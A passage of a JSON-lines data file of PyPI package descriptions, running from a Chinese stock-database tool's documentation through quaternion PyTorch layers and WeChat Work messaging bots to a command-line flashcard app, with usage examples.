\u4ee3\u7801\uff0c\u9ed8\u8ba4\u53d6\u6240\u6709\uff0c\u652f\u6301int\u5982300, list\u5982[1, '300', 399905]\u5217\u8868\u5185\u53ef\u4ee5\u662f\u6570\u503c\u6216strshift\u2013 \u5f80\u524d\u63a8\u7684\u65f6\u95f4\uff0c\u9ed8\u8ba40\uff0c\u4ec5\u652f\u6301intforward\u2013 \u5f80\u540e\u63a8\u7684\u65f6\u95f4\uff0c\u9ed8\u8ba40\uff0c\u4ec5\u652f\u6301intnewdrop\u2013 \u65b0\u80a1\u4e0a\u5e02\u591a\u5c11\u4ea4\u6613\u65e5\u5185\u4e0d\u4ea4\u6613\uff0c\u9ed8\u8ba40\uff0c\u4ec5\u652f\u6301intstdrop\u2013 \u662f\u5426\u5254\u9664st\u80a1\uff0cTrue\u5254\u9664\uff0c\u9ed8\u8ba4Truedeldrop\u2013 \u662f\u5426\u5254\u9664\u9000\u5e02\u80a1\uff0cTrue\u5254\u9664\uff0c\u9ed8\u8ba4Falsestardrop\u2013 \u662f\u5426\u5254\u9664\u79d1\u521b\u677f\u80a1\uff0cTrue\u5254\u9664\uff0c\u9ed8\u8ba4Truetime_start\u2013 \u5206\u949f\u6570\u636e\u7684\u53ef\u9009\u53c2\u6570\uff0c\u5f00\u59cb\u65f6\u95f4\uff0c\u9ed8\u8ba4None\uff0c\u652f\u6301str\u5982'09:35:30'time_end\u2013 \u5206\u949f\u6570\u636e\u7684\u53ef\u9009\u53c2\u6570\uff0c\u7ed3\u675f\u65f6\u95f4\uff0c\u9ed8\u8ba4None\uff0c\u652f\u6301str\u5982'09:35:30'tablename\u2013 \u67e5\u8be2\u8868\u540d\uff0cstr\u7c7b\u578bdbname\u2013 \u6570\u636e\u5e93\u540d\uff0cstr\u7c7b\u578b\uff0c\u540e\u7f00\u53ef\u52a0\u53ef\u4e0d\u52a0\uff0c\u5982test\u6216test.sqlite3\u5747\u5408\u6cd5\u8fd4\u56de\u503c\u4e3adataframe\u683c\u5f0f\u6570\u636e\u8868.\u793a\u4f8b1\uff1a[In]: 
read.read_ts_day_data(start='20200313', end=20200313, forward=1, shift=1, newdrop=60) # \u53c2\u6570\u89c1\u6587\u6863\uff08ctrl+Q\uff09\n \n [Out]:\n id code date ... up_limit vol volume_ratio\n 10575 1753771 603998 2020-03-13 ... 7.67 59193.06 1.01\n 10576 1757673 603998 2020-03-16 ... 7.45 65566.00 1.11\n 10577 1751490 603999 2020-03-12 ... 7.12 94223.01 1.06\n 10578 1755746 603999 2020-03-13 ... 6.89 112777.40 1.29\n 10579 1756595 603999 2020-03-16 ... 6.64 83763.32 0.89\n [5 rows x 42 columns]\u793a\u4f8b2\uff1a[In]: query_index_min(start=20200402, end=20200402, tablename='jj_1min_index_data', dbname='jj_data')\n \n [Out]: \n code date ... volume datetime\n 1915 399006 2020-04-02 ... 17922320.0 2020-04-02 14:56:00\n 1916 399006 2020-04-02 ... 16854299.0 2020-04-02 14:57:00\n 1917 399006 2020-04-02 ... 1227189.0 2020-04-02 14:58:00\n 1918 399006 2020-04-02 ... 0.0 2020-04-02 14:59:00\n 1919 399006 2020-04-02 ... 33783690.0 2020-04-02 15:00:00\n [5 rows x 10 columns]\u5de5\u5177\u7bb1get_tableinfo_cols\u83b7\u53d6\u67d0\u4e2a\u6570\u636e\u5e93\u67d0\u4e2a\u8868\u7684\u6240\u6709\u5217\u540dcheck_time\u4fee\u6b63\u65f6\u95f4\u683c\u5f0f\uff0c\u8f93\u5165strintdatetime\u7edf\u4e00\u53d8\u4e3astr: '2018-09-08'\u578bget_timesection\u83b7\u53d6\u6307\u5b9a\u8d77\u6b62\u65e5\u671f\u7684\u4ea4\u6613\u65e5\u5386\u793a\u4f8b1\uff1a[In]: read.get_timesection(start='20200313', end=20200315, shift=5) # shift\u4e3a\u53c2\u6570\uff0c\u53d6\u524dn\u4ea4\u6613\u65e5 \n \n [Out]: \n ['2020-03-06', '2020-03-09', '2020-03-10', '2020-03-11', '2020-03-12', '2020-03-13']get_opendate\u67e5\u627e\u6307\u5b9a\u65f6\u95f4\u9644\u8fd1\u7684\u4ea4\u6613\u65e5\u793a\u4f8b2\uff1a[In]: read.get_opendate(time=20200315, shift=1) # shift\u4e3a\u53c2\u6570\uff0c\u53d6\u524dn\u4ea4\u6613\u65e5`\n \n [Out]:\n `2020-03-13db_maintain.py\u6ce8\u610f\u4e8b\u9879\u4f7f\u7528db_maintain.py\u53ea\u9700\u8981\u4e86\u89e3\u6700\u57fa\u7840\u7684sql\u8bed\u6cd5\u542b\u4e49\u5373\u53ef\u4f7f\u7528\uff0c\u5982\u6709\u7591\u95ee\uff0c\u53c2\u8003sql\u8bed\u6cd5\u6587\u6863\u63a5\u53e3db_maintain.py\u6587\u4ef6\u91cc\u5747\u6709\u4e3b\u8981\u529f\u80fd\u7684\u8be6\u7ec6\u53c2\u6570\u8bf4\u660e\uff0c\u53ef\u4ee5\u901a\u8fc7main\u91cc\u7684\u793a\u4f8b\uff0c\u5bf9\u4e0a\u8ff04\u4e2a\u529f\u80fdctrl+\u9f20\u6807\u5de6\u952e\u6216Ctrl+Q\u67e5\u770b\u57fa\u672c\u529f\u80fd\u5305\u62ec4\u4e2a:update_datareplace_datarebuild_datainsert_data\u4e0b\u9762\u9010\u4e00\u4ecb\u7ecdupdate_data\u6b64\u63a5\u53e3\u638c\u7ba1\u6570\u636e\u66f4\u65b0\uff0c\u4e0esql\u4e2d\u7684update\u542b\u4e49\u7c7b\u4f3c\uff0c\u5c06\u539f\u6765\u8868\u7684\u67d0\u4e9b\u5df2\u6709\u6570\u636e\u66f4\u65b0\uff0c\u6bd4\u5982\u5c06test\u8868\u4e2d2018\u5e7410\u670815\u65e5\u523016\u65e5\u7684volume\u6539\u53d8\u4e3a\u8f93\u5165df\u4e2d\u7684\u5bf9\u5e94\u503c\uff0c\u76f8\u6bd4sql\u8bed\u53e5\u7684update\uff0c\u76f4\u63a5\u989d\u5916\u6dfb\u52a0\u5217\uff0c\u4ee5\u53ca\u81ea\u52a8\u88c1\u526a\u91cd\u590d\u6570\u636e\u793a\u4f8b\uff1afactor.update_data(\n dbpath='D/fundamentals.sqlite3', tablename='test',\n newcols={'circ_mv': 'real'}, df_data=df, index_col='code,date', 
autoadd=True)\u4e0a\u8ff0\u4ee3\u7801\u57fa\u672c\u542b\u4e49\u4e3a\uff1a\u5728D\u76d8\u66f4\u65b0fundamental\u6570\u636e\u5e93\u4e2d\u7684test\u8868\uff0c\u65b0\u589e\u4e00\u5217circ_mv\u4e14\u5b9a\u4e49\u683c\u5f0f\u4e3areal\uff0c\n\u4f20\u5165\u7684dataframe\u4e3adf\uff0ctest\u8868\u7684\u7d22\u5f15\u4e3acode,date\uff0cautoadd\u6253\u5f00\u5219\u5269\u4f59\u672a\u50cfcirc_mv\u5b9a\u4e49\u4e3areal\u7684\u989d\u5916\u5217\n\uff08df\u6709\u800c\u6570\u636e\u5e93\u6ca1\u6709\u7684\u5217\uff09\u5c06\u6309\u7167sqlite\u9ed8\u8ba4\u683c\u5f0f\u5165\u5e93\u4f7f\u7528\u573a\u666f\uff1a\u67d0\u6bb5\u65f6\u95f4\u533a\u95f4\u7684\u67d0\u51e0\u5217\u6570\u636e\u6709\u95ee\u9898\uff0c\u91cd\u65b0\u5165\u5e93\u5bf9\u5e94\u51e0\u5217\u65f6\u4f7f\u7528replace_data\u6b64\u63a5\u53e3\u638c\u7ba1\u6570\u636e\u8868\u5b8c\u5168\u66ff\u6362\uff0c\u8c28\u614e\u4f7f\u7528\uff0c\u4f7f\u7528\u540e\u539f\u8868\u4f1a\u5220\u9664\uff0c\u64cd\u4f5c\u548cupdate\u5927\u4f53\u4e00\u81f4\uff0c\u989d\u5916\u591a\u53c2\u6570index_name\uff0c\u4e3a\u66ff\u6362\u540e\u65b0\u8868\u7684\u521b\u5efa\u7684\u7d22\u5f15\u540d\u79f0\u5982'index_b1'\u4f7f\u7528\u573a\u666f\uff1a\u6574\u4e2a\u8868\u8fc7\u4e8e\u8001\u65e7\u6216\u51fa\u4e8e\u5176\u4ed6\u539f\u56e0\u8981\u6574\u8868\u66ff\u6362\u65f6\u4f7f\u7528rebuild_data\u6b64\u63a5\u53e3\u638c\u7ba1\u5df2\u6709\u6570\u636e\u7684\u66ff\u6362\uff0c\u76f8\u5bf9\u4e8ereplace\u66f4\u4e3a\u6e29\u548c\uff0c\u76f8\u5bf9\u4e8eupdate\u66f4\u4e3a\u6fc0\u8fdb\uff0c\u662f\u5728\u539f\u8868\u57fa\u7840\u4e0a\u4fee\u6539\u4e00\u90e8\u5206\u6570\u636e\uff0c\u4f46\u662f\u662f\u6309\u7167\u65f6\u95f4\u533a\u95f4\uff0c\u8d77\u59cb\u65f6\u95f4\u5230\u7ec8\u6b62\u65f6\u95f4\u7684\u6240\u6709\u6570\u636e\u4f1a\u88ab\u6e05\u7a7a\u540e\u91cd\u65b0\u5199\u5165\uff0c\u4e0d\u80fd\u6307\u5b9a\u67d0\u4e00\u5217\uff0c\u64cd\u4f5c\u65b9\u6cd5\u540cupdate\u4f7f\u7528\u573a\u666f\uff1a\u67d0\u6bb5\u65f6\u95f4\u533a\u95f4\u7684\u6570\u636e\u6574\u4f53\u6027\u5165\u9519\uff0c\u91cd\u65b0\u5165\u5e93\u65f6\u4f7f\u7528insert_data\u6b64\u63a5\u53e3\u638c\u7ba1\u6570\u636e\u63d2\u5165\uff0c\u4e0esql\u4e2d\u7684insert\u542b\u4e49\u7c7b\u4f3c\uff0c\u4f46\u662f\u76f8\u6bd4sql\u8bed\u53e5\uff0c\u8be5\u63a5\u53e3\u53ef\u4ee5\u989d\u5916\u6dfb\u52a0\u5217\uff0c\u4ee5\u53ca\u81ea\u52a8\u88c1\u526a\u548c\u5e93\u91cc\u91cd\u590d\u6570\u636e\uff0c\u64cd\u4f5c\u65b9\u5f0f\u4e0eupdate\u57fa\u672c\u4e00\u81f4,\u989d\u5916\u591a\u4e86insertmode\u53c2\u6570\uff0c\u8be6\u7ec6\u89e3\u91ca\u89c1db_maintain\u4f7f\u7528\u573a\u666f\uff1a\u6dfb\u52a0\u65b0\u6570\u636e\uff0c\u6bcf\u65e5\u66f4\u65b0\u6570\u636e\u5e93\u7b49creat_dbtable\u6b64\u63a5\u53e3\u638c\u7ba1\u5efa\u5e93\u5efa\u8868\u6216\u8005\u5728\u5df2\u5b58\u5728\u7684\u5e93\u91cc\u5efa\u8868\uff0c\u8be6\u7ec6\u89e3\u91ca\u89c1db_maintain\u4f7f\u7528\u573a\u666f\uff1a\u65b0\u5efa\u4e86\u6570\u636e\u5e93\u6216\u8005\u56e0\u5b50\u8868\uff0c\u7528\u4e8e\u4ed6\u4eba\u4f7f\u7528\u65f6\u65e0\u5e93\u5efa\u5e93\uff0c\u65e0\u8868\u5efa\u8868\uff0c\u4f7f\u5f97\u4f7f\u7528\u8005\u5b8c\u5168\u4e0d\u9700\u8981\u638c\u63e1\u6570\u636e\u5e93\u64cd\u4f5c\u5373\u53ef\u5b8c\u6210\u76f8\u5173\u9700\u6c42LicenseThis is free and unencumbered software released into the public domain.Anyone is free to copy, modify, publish, use, compile, sell, or\ndistribute this software, either in source code form or as a compiled\nbinary, for any purpose, commercial or non-commercial, and by any means."} +{"package": "qytorch", "pacakge-description": "qytorchQuaternion TorchA python library which has quaternion versions 
of some of the mostly used libraries in torch.nn. It supports all of the features of the supported layers. Main advantage of quaternion layers is that, it has only 1/4th the number of weights compared to it's real counterpart."} +{"package": "qytPython", "pacakge-description": "Python\u5de5\u5177\u5305\u5b89\u88c5\u65b9\u5f0f\u4e0b\u8f7d\u6b64\u9879\u76ee\uff0c\u8fdb\u5165\u9879\u76ee\u6839\u76ee\u5f55\uff0c\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u5b89\u88c5\uff1apythonsetup.pyinstall\u4f7f\u7528pip\u8fdb\u884c\u5b89\u88c5pipinstallqytPython\u9002\u7528\u5e73\u53f0LinuxWindowsPython\u7248\u672c\u8981\u6c42\u5927\u4e8e\u7b49\u4e8epython 3.6\u7248\u672c\u4fe1\u606f\u5f53\u524d\u7248\u672c\uff08\u589e\u52a0ZIP\u89e3\u538b\uff0c\u589e\u52a0ftp\u4e0b\u8f7d\uff09\uff1av0.0.3\u5386\u53f2\u7248\u672c0.0.1 : \u57fa\u7840\u7248\u672c\u4f7f\u7528\u6587\u6863git\u5730\u5740\uff1ahttps://github.com/q759729997/qytPython\u5de5\u5177\u7c7b\u4f7f\u7528\u624b\u518c-readme_tools.md\u81f4\u8c22\u5f00\u6e90\u9879\u76ee\uff1ahttps://github.com/fastnlp/fastNLP"} +{"package": "qywechat", "pacakge-description": "QyWechatThis is a msg-robot forqywechatInstallpython -m pip install qywechatGetting Startedsend text msgimport qywechat\nkey = \"b8cxxx\"\nbot = qywechat.Bot(key)\ndata = {\n \t\"msgtype\": \"text\",\n \t\"text\": {\n \t\"content\": \"hello world\"\n \t}\n }\n# @ user, all user\n# data = {\n# \"msgtype\": \"text\",\n# \"text\": {\n# \"content\": \"LiuKeTest Msg\",\n#\t\t\"mentioned_list\":[\"liuke\",\"@all\"],\n#\t\t\"mentioned_mobile_list\":[\"13800001111\",\"@all\"]\n# }\n#}\nbot.send_msg(data)send markdown msgdata = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"content\": \"\u5b9e\u65f6\u65b0\u589e\u7528\u6237\u53cd\u9988132\u4f8b\uff0c\u8bf7\u76f8\u5173\u540c\u4e8b\u6ce8\u610f\u3002\\n\n >\u7c7b\u578b:\u7528\u6237\u53cd\u9988\n >\u666e\u901a\u7528\u6237\u53cd\u9988:117\u4f8b\n >VIP\u7528\u6237\u53cd\u9988:15\u4f8b\"\n }\n}send imagebot.img_msg(\"path/test.jpg\")send filemedia_id = bot.upload_file(\"path/liuke.zip\")\ndata = {\n \"msgtype\": \"file\",\n \"file\": {\n \t\t\"media_id\": media_id\n }\n}\nbot.send_msg(data)send image & text msgdata = {\n \"msgtype\": \"news\",\n \"news\": {\n \"articles\" : [\n {\n \"title\" : \"LiuKeTest\",\n \"description\" : \"qywechat\",\n \"url\" : \"https://xxx\",\n \"picurl\" : \"http://xxx.png\"\n }\n ]\n }\n}\nbot.send_msg(data)FeaturesSupport all types messageSupport send imageSupport upload fileContributingContributions are welcome.If you've found a bug within this project, please open an issue to discuss what you would like to change.If it's an issue with the API, please report any new issues atqywechat issues"} +{"package": "qyweixin", "pacakge-description": "qyweixinEnterprise weixin, interface.Usageget token>>>importqyweixin>>>token=qyweixin.get_token('corpid','corpsecret')>>>token...push message>>>importqyweixin>>>push_msg=qyweixin.WeixinPush()>>>push_msg.push_text_msg(token=token,agentid=0,content='test msg',touser='test',toparty='test_group',totag='',safe=0)Trueupload files>>>importqyweixin>>>media_id=qyweixin.upload(token,filename,filepath,filetype)...Featurespush messagesuploads mediamanage mediamore qyweixin apiInstallationTo install qyweixin, simply:$pipinstallqyweixinNoticeThis package on v0.3.0 has one broken api. 
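Pulling the qyweixin Usage snippets above together, here is a hedged end-to-end sketch for pushing a text message. The corpid/corpsecret values and message content are placeholders, agentid 0 is just the documented example value, and the failure handling reflects the Notice about the newer API returning error details rather than True.

# Sketch: obtain a token and push a text message with qyweixin (placeholder credentials).
import qyweixin

token = qyweixin.get_token('my-corpid', 'my-corpsecret')  # placeholder corpid/corpsecret

pusher = qyweixin.WeixinPush()
ok = pusher.push_text_msg(
    token=token,
    agentid=0,            # documented example agent id
    content='test msg',
    touser='test',
    toparty='test_group',
    totag='',
    safe=0,
)

# Per the Notice: when the message fails to send, the details are returned instead of True.
if ok is not True:
    print('push failed:', ok)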
When the message fails to send, the details are returned.LicenseCopyright (C) 2015-2017 TaoBeierHISTORY2015.09.27 Start2015.10.08 Add file upload2015.11.19 Simple API2016.11.22 Upgrade to 0.2.2 improve push_message API"} +{"package": "qywx-app-message", "pacakge-description": "https://github.com/not-know/qywx_app_message"} +{"package": "qz", "pacakge-description": "No description available on PyPI."} +{"package": "qz7_hello", "pacakge-description": "No description available on PyPI."} +{"package": "qz7.shell", "pacakge-description": "qz7.shellConstruct and execute shell command lists locally or remotely via ssh.qz7.shell is library for easily creating and executing command lists.\nA command list is a list of simple commands that are executed\nby an underlying shell."} +{"package": "qz7.subprocess-w", "pacakge-description": "qz7.subprocess_wA Popen wrapper for graceful process terminationThis package provides a Popen wrapper class\ncalled PopenW that termimates subprocess cleanly,\ninstead of leaving zombie or orphan processes\nwhen the parent process raises an unexpected exception."} +{"package": "qz7.term-signals", "pacakge-description": "qz7.term_signalsFunctions for gracefully handling important term signals."} +{"package": "qz-doudizhu", "pacakge-description": "Python \u6597\u5730\u4e3b\u8fd8\u6ca1\u5b8c\u6210\uff0c\u4f46\u53ef\u4ee5\u8fd0\u884c\u4e86"} +{"package": "qzhub-core", "pacakge-description": "No description available on PyPI."} +{"package": "qzig", "pacakge-description": "No description available on PyPI."} +{"package": "qzlt", "pacakge-description": "qzltAQuizletclone for the command line.Built WithPythonTyperPoetry(back to top)InstallationPyPIpip install qzltFrom sourceWithPoetryinstalled, rungit clone https://github.com/calvincheng/qzlt.git\ncd qzlt\npoetry shell\npoetry install(back to top)UsageQuick startLet's create a new set to start learning some common Chinese vocabulary. Runquiz sets createTitle: chinese\nDescription: Common expressions in Chineseand follow the prompts to give your set a title and a description.You can see that the newly created set exists by listing all sets viaquiz sets listTITLE DESCRIPTION\nchinese Common expressions in ChineseBy default, new sets are empty when created. Let's change that by adding some cards. Runquiz set add chineseYou'll be prompted to start giving your card a term and a definition.Term: \u4f60\u597d\nDefinition: Hello\nCard addedAdd as many cards as you want. When you're done, pressctrl-Cto exit.To see all the cards you've just added, runquiz set list chineseTERM DEFINITION\n[0] \u4f60\u597d Hello\n[1] \u518d\u898b Goodbye\n[2] \u958b\u5fc3 Happy\n[3] \u50b7\u5fc3 Sad\n[4] \u860b\u679c Apple\n[5] \u9999\u8549 BananaYou're all set! To study your new set, runquiz study chineseTo see all the study modes available, runquiz study --helpCommandsUsage: quiz [OPTIONS] COMMAND [ARGS]...\n\nOptions:\n --install-completion Install completion for the current shell.\n --show-completion Show completion for the current shell, to copy it or\n customize the installation.\n --help Show this message and exit.\n\nCommands:\n set Manage an individual set\n sets Manage all sets\n study Begin a study session(back to top)RoadmapImport from AnkiCollect and display statistics (review heatmap, streaks, etc.)Add config file to customise experience (e.g. shuffle by default)Smarter corrections (e.g. 
allow answers from either grammatical gender: professeur\u2022e); Markdown support for cards; Incorporate TTS; Resume interrupted sessions. License: Distributed under the MIT License. Contact: Calvin Cheng - calvin.cc.cheng@gmail.com. Project Link: https://github.com/calvincheng/qzlt"} +{"package": "qzonesecret", "pacakge-description": "Find secrets in Qzone of any QQ."} +{"package": "qztest", "pacakge-description": "No description available on PyPI."} +{"package": "qz-testpypi", "pacakge-description": "No description available on PyPI."}
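The qzlt quick-start above is interactive (it prompts for a title, description, terms and definitions). For scripted setups, a sketch like the following pipes those answers on stdin; it assumes the quiz entry point from pip install qzlt is on PATH, and that `quiz set add` stops acceptably when stdin runs out, which is an assumption rather than documented behaviour. The set name and cards are the examples from the walkthrough.

# Sketch: driving the documented qzlt commands non-interactively via stdin.
import subprocess

# `quiz sets create` asks for Title and Description.
subprocess.run(
    ["quiz", "sets", "create"],
    input="chinese\nCommon expressions in Chinese\n",
    text=True,
    check=True,
)

# `quiz set add` keeps prompting Term/Definition until interrupted, so feed the pairs
# and let the command finish when stdin is exhausted (no check=True: exit code may be non-zero).
cards = [("\u4f60\u597d", "Hello"), ("\u518d\u898b", "Goodbye")]
answers = "".join(f"{term}\n{definition}\n" for term, definition in cards)
subprocess.run(["quiz", "set", "add", "chinese"], input=answers, text=True)

# Show the cards that were just added.
subprocess.run(["quiz", "set", "list", "chinese"], check=True)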